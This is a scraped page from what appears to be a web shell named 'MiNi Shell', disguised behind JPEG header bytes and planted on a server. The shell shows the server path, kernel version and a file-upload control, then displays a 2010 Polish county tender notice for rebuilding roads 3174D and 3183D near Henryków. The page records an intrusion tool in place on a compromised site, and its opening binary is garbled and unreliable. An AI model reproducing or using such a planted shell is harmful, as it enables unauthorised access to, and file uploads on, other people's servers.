JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100127/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100127/17947-N-2010.html

<p class="kh_header"><b>Ząbkowice Śląskie: Poprawa  dostępności komunikacyjnej Opactwa Cysterskiego w Henrykowie - przebudowa dróg nr 3174D i 3183D (Ząbkowice Śl. - Henryków)</b><br>
<b>Numer ogłoszenia: 17947 - 2010; data zamieszczenia: 27.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Ząbkowicki , ul. Sienkiewicza 11, 57-200 Ząbkowice Śląskie, woj. dolnośląskie, tel. 074 8162800, faks 074 8162850.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.zabkowicki.powiat.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Poprawa  dostępności komunikacyjnej Opactwa Cysterskiego w Henrykowie - przebudowa dróg nr 3174D i 3183D (Ząbkowice Śl. - Henryków).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót budowlanych zadania  pn. Poprawa  dostępności   
    komunikacyjnej Opactwa Cysterskiego w Henrykowie - przebudowa dróg nr 3174D i 3183D 
    (Ząbkowice Śl. - Henryków) 
       Etap I - odcinek drogi powiatowej nr 3174D od drogi wojewódzkiej nr 395 w m. Henryków km  0+000 
       do skrzyżowania z drogą powiatową nr 3174D w m. Krzelków km 3+845 oraz odcinek drogi nr 3174D od 
       skrzyżowania z drogą nr 3183D w m. Krzelków km 14+312 do km 9+103  w m.Sieroszów - długość
       9.054 km.
       Etap II - odcinek drogi powiatowej nr 3174D  w m. Sieroszów  km 9+103 do skrzyżowania z  drogą
       wojewódzką  nr 385 km 0+000 w miejscowości Ząbkowice Śl. - długość  9.103 km.
Podstawowy zakres przebudowy drogi obejmuje:
       - budowę odcinków chodników o szerokości 2,5m na odcinku od skrzyżowania z drogą 
          wojewódzką nr 385 w miejscowości Ząbkowice Śl. do stacji paliw w km 0+400, od km 0+000 do 
          km 3+845 DP nr 3183D,
       - budowę odcinków chodników o szerokości 2,0m na odcinku drogi powiatowej nr 3183D od km 
          3+085 do km 3+845 strona lewa i prawa,
       - przebudowę skrzyżowań z drogami gminnymi i  powiatowymi,
       - przebudowę zjazdów,
       - poszerzenie nawierzchni do 5,5m, od km 0+000 do km 6+760 DP nr 3174D,
       - poszerzenie nawierzchni do 5,0m, od km 0+000 do km 3+845 DP nr 3183D,
       - poszerzenie nawierzchni do 5,0m, od km 6+760 do km 14+312 nr 3174D,
       - wprowadzenie elementów uspokojenia ruchu w terenie obszaru zabudowanego,
       - renowację rowów,  
       - wykonanie odcinków rowów krytych z odprowadzeniem wody,
       - przebudowę istniejących przepustów pod koroną drogi i zjazdami,
       - wykonanie korekty łuków poziomych i pionowych,
       - wykonanie wzmocnienia konstrukcji istniejącej nawierzchni bitumicznej wraz z wykonaniem 
          nowej nawierzchni bitumicznej na całej długości i szerokości przebudowywanego odcinka drogi,
       - wykonanie i uzupełnienie oznakowania pionowego i poziomego,
Szczegółowo  przedmiot zamówienia określa projekt zagospodarowania terenu (etap I + II),  projekt 
    budowlany branża drogowa, energetyczna, telekomunikacyjna (etap I + II), pomocniczo przedmiar  robót 
    (dla etap I i II) specyfikacje  techniczne wykonania i odbioru robót budowlanych, będące załącznikami 
    nr 9-15 do SIWZ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.11.10.00-8, 45.11.25.00-0, 45.11.27.30-1, 45.20.00.00-9, 45.23.00.00-8, 45.23.10.00-5, 45.23.24.11-6, 45.23.30.00-9, 45.23.31.29-9, 45.23.32.21-4, 45.23.32.69-9, 45.23.32.80-5, 45.23.32.90-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.09.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający żąda wniesienia wadium w wysokości 300.000 zł<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki określone w art. 22 
    ust.1 ustawy Prawo zamówień publicznych, dotyczące:
   1) Posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa 
       nakładają obowiązek ich posiadania,    2) Posiadania wiedzy i doświadczenia; .     - wykonali, co najmniej 2 roboty budowlane w zakresie budowy, przebudowy dróg, co najmniej 
         kategorii Z o długości min. 5 km, o podobnym charakterze i złożoności oraz wartości nie mniejszej niż 
        10.000.000 PLN.
        Dopuszcza się spełnienie tego wymagania w zakresie długości i wartości w ramach jednego zadania lub 
        dwóch zadań łącznie. 
  3) Dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania 
      zamówienia;
      - dysponują kierownikiem budowy, kierownikiem robót drogowych, energetycznych i 
         telekomunikacyjnych posiadających odpowiednie uprawnienia budowlane, legitymującym się min.
         3 letnim doświadczeniem i są wpisani na listę członków właściwej izby samorządu  zawodowego.
         Osoba proponowana do pełnienia funkcji Kierownika budowy, winna posiadać uprawnienia budowlane 
         bez ograniczeń, doświadczenie  przy robotach obejmujących budowę lub  przebudowę dróg  klasy min.
         Z, o długości co najmniej 6 km i wartości min.6.000.000 PLN.
         Dopuszcza się spełnienie tego wymagania w zakresie długości i wartości w ramach jednego  zadania 
         lub dwóch zadań łącznie. 
  4) Sytuacji ekonomicznej i finansowej;
       - posiadania opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że 
         Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności
          związanej przedmiotem zamówienia na kwotę nie mniejszą niż 6.000.000 PLN. na okres wykonania 
         zamówienia. 
      -  informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym Wykonawca posiada
         rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową 
         Wykonawcy na kwotę nie mniejszą niż 6.000.000 PLN, wystawioną nie wcześniej niż 3 miesiące przed
        upływem terminu składania ofert.   
2. Wykonawcy, którzy nie wykażą spełnienia warunków udziału w postępowaniu podlegać będą 
     wykluczeniu z udziału w postępowaniu. Ofertę Wykonawcy wykluczonego uznaje się za odrzuconą. 3. Z udziału w niniejszym postępowaniu wyklucza się wykonawców, którzy podlegają wykluczeniu na 
    podstawie art. 24 ust. 1 i 2 Prawa zamówień publicznych. 4. Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty 
    złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia/niespełna..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> A. Na ofertę składają się następujące dokumenty i załączniki: 
 1. Wypełniony formularz ofertowy. 
 2. Wypełniony kosztorys ofertowy dla  I i II etapu.
 3. Oświadczenie o spełnieniu warunków udziału w postępowaniu z art. 22 ust.1 Prawa zamówień 
     publicznych.
 4. Oświadczenie o braku podstaw do wykluczenia z postępowania o udzielenie zamówienia z art. 24 ust.1 i 2 
     Prawa zamówień publicznych.
 5. Wypełniony i parafowany przez Wykonawcę wzór umowy.
 6. Dowód wniesienia wadium.   
 
B. W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia 
 z art. 24 ust 1 Prawa zamówień publicznych wykonawca składa następujące dokumenty: 1. Aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu 
    wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt. 2 ustawy, wystawionego nie 
    wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2. Dokumenty potwierdzające posiadanie uprawnień/pełnomocnictw osób składających ofertę, o ile nie 
    wynika to z przedstawionych dokumentów rejestrowych. 3. Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzającego, że Wykonawca 
    nie zalega z opłacaniem podatków, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, 
    odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji 
    właściwego organu - wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
4. Aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego
    Ubezpieczenia Społecznego potwierdzającego, że wykonawca nie zalega z opłacaniem składek na
    ubezpieczenia zdrowotne i społeczne, lub potwierdzenia, że uzyskał przewidziane prawem zwolnienie, 
    odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji 
    właściwego organu -wystawionego nie wcześniej niż 3 miesiące przed upływem  terminu składania ofert.
5. Aktualną informację z Krajowego Rejestru Karnego albo równoważne zaświadczenie właściwego 
    organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 
    ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
6. Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9, 
    wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
C. W celu wykazania spełnienia przez wykonawcę warunków, o których mowa w art. 22 ust.1 pkt. 1-3 
ustawy Pzp, należy złożyć następujące dokumenty:
1. Wykaz wykonanych robót budowlanych w zakresie niezbędnym do wykazania spełnienia warunku 
    wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania  
    ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,  z podaniem ich rodzaju i 
    wartości, daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty zostały 
    wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone tj.
    - co najmniej 2 roboty budowlane w zakresie budowy, przebudowy dróg, kategorii minimum Z, o długości
      minimum 5 km, o podobnym charakterze i złożoności oraz wartości nie mniejszej niż 10.000.000 PLN 
     (w  ramach jednego zadania lub dwóch zadań łącznie ).
2. Wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy robót 
    budowlanych, w celu realizacji zamówienia wraz z informacją o podstawie dysponowania tymi zasobami.
3. Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za 
    kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, 
    doświadczenia i wykształcenia niezbędnego do wykonania zamówienia, a także zakresu wykonywanych 
    przez nich czynności, oraz informacji o podstawie do dysponowania tymi osobami. 
    Do niniejszego wykazu należy załączyć dokumenty potwierdzające, posiadane uprawnienia budowlane, 
    oraz zaświadczenie o przynależności do właściwej izby samorządu zawodowego.
4. Opłaconą polisę, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest 
    ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej przedmiotem
    zamówienia - na kwotę nie mniejszą niż 6.000.000 PLN. na okres wykonania zamówienia. 
5. Informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym Wykonawca posiada 
    rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową 
   Wykonawcy na kwotę nie mniejszą niż 6.000.000 PLN, wystawioną nie wcześniej niż 3 miesiące przed 
   upływem terminu składania ofert.

D. Wykonawca który ma siedzibę lub miejsce  zamieszkania poza terytorium Rzeczypospolitej Polskiej: 1. Zamiast dokumentów, o których mowa w cz. VIII.B.1, 3, 4 i 6  składa dokument lub dokumenty, 
    wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:     1) nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed 
        upływem terminu składania ofert.     2) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo, że 
        uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności  lub 
        wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące
        przed upływem terminu składania ofert.     3) nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 
        miesięcy przed upływem terminu składania ofert. 
2. Zamiast dokumentu, o którym mowa w cz.VIII.B.6 składa zaświadczenie właściwego organu sądowego lub
    administracyjnego miejsca zamieszkania  albo zamieszkania osoby, której dokumenty dotyczą, w zakresie 
    określonym w art. 24 ust. 1 pkt 4-8 ustawy Prawo zamówień publicznych -  wystawiony nie wcześniej niż 
    6 miesięcy przed upływem terminu składania ofert.  3. Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce
    zamieszkania, nie wydaje się dokumentów wskazanych w niniejszym pkt.D.1 i 2 zastępuje się je 
    dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem  sądowym,
    administracyjnym albo organem samorządu zawodowego lub gospodarczego  odpowiednio miejsca 
    zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce  zamieszkania -
    wystawionych nie wcześniej niż w terminach określonych w cz..VI.D. 
E. Dokumenty wymagane w przypadku składania oferty wspólnej:  1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, w takim przypadku dla ustanowionego
    pełnomocnika do oferty należy załączyć pełnomocnictwo do reprezentowania w  postępowaniu lub do 
    reprezentowania w postępowaniu i zawarcia umowy. 2. Oferta winna zawierać: oświadczenia i dokumenty opisane w cz. VIII.A.3 i 4 oraz w cz.VIII.B.1, 3, 4, 5, 6, 
    dla każdego partnera z osobna, pozostałe dokumenty składane są wspólnie. 
3. W przypadku składania oferty przez Wykonawców występujących wspólnie, Wykonawcy ustanowią 
    pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w
    postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. 
   Pełnomocnictwo może być przedłożone wyłącznie w formie oryginału lub kopii poświadczonej  przez 
   notariusza.
4. Podmioty występujące wspólnie ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte 
    wykonanie zobowiązań  
5. W przypadku dokonania wyboru oferty Wykonawcy występującego wspólnie przed przystąpieniem do 
    zawarcia umowy o zamówienie publiczne przedłożona zostanie umowa regulującą współpracę 
   Wykonawców występujących wspólnie. Termin, na jaki została zawarta umowa Wykonawców nie może 
   być krótszy od terminu określonego na wykonanie zamówienia.  
F. Postanowienia dotyczące składanych dokumentów
1. Jeżeli wykonawca wykazując spełnienie warunków, o których mowa w pkt. C  polega na zasobach  innych 
    podmiotów zobowiązany jest wykazać, że w stosunku do tych podmiotów brak jest podstaw wykluczenia
    z postępowania o udzielenie zamówienia poprzez złożenie razem z ofertą dokumentów wymienionych w
    cz.VIII. B.1 - 6 dotyczących każdego z tych podmiotów, o ile podmioty te będą brały udział w realizacji
    części zamówienia.
2. Dokumenty w niniejszym postępowaniu mogą być składane w oryginale lub kopii poświadczonej za
    zgodność z oryginałem przez Wykonawcę lub osoby uprawnione do podpisania oferty z dopiskiem - za zgodność z oryginałem.
3. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku
    podmiotów, o których mowa w pkt.F.1, kopie dokumentów dotyczących każdego z tych podmiotów 
    winny być poświadczane za zgodność z oryginałem przez te podmioty.
4. Oferta, składane dokumenty oraz oświadczenia podpisane przez upoważnionego przedstawiciela 
    wykonawcy wymagają załączenia właściwego pełnomocnictwa lub umocowania prawnego. 5. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, 
    poświadczonym przez Wykonawcę. 6. Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu 
    wyłącznie wtedy, gdy złożona przez wykonawcę kopia dokumentu jest nieczytelna lub budzi wątpliwości, 
    co do jej prawdziwości..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.zabkowicki.powiat.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiat Ząbkowicki
 ul. Sienkiewicza 11
  57-200 Ząbkowice Śl. pok.110.Koszt specyfikacji w wersji papierowej 1000zł..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.02.2010 godzina 09:00, miejsce: Powiat Ząbkowicki
ul. Sienkiewicza 11 ,
57-200 Ząbkowice Śląskie
Sekretariat pok.202.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego

Creat By MiNi SheLL
Email: jattceo@gmail.com